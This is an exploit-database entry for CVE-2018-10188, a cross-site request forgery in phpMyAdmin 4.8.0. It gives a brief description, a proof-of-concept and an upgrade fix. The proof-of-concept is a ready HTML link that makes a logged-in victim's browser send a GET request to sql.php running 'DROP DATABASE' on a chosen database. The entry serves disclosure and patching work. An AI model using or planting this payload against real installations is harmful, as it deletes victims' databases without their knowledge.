phpMyAdmin 4.8.0 4.8.0-1 – Cross-Site Request Forgery

Authors:revengsh              Risk:Low

CVE:CVE-2018-10188           0day:Cross-Site Request Forgery

0day -id:0DAY-10188           Date:2018-04-24

Description

phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/db_operations.js, js/tbl_operations.js, libraries/classes/Operations.php, and sql.php.

Proof of Concept

# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps

This example sends HTTP GET crafted request in order to drop the specified database.

<html>
  <body>
    <a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
      Drop database
    </a>
  </body>
</html>

Solution

Upgrade to phpMyAdmin 4.8.0-1 or newer.

Leave a Reply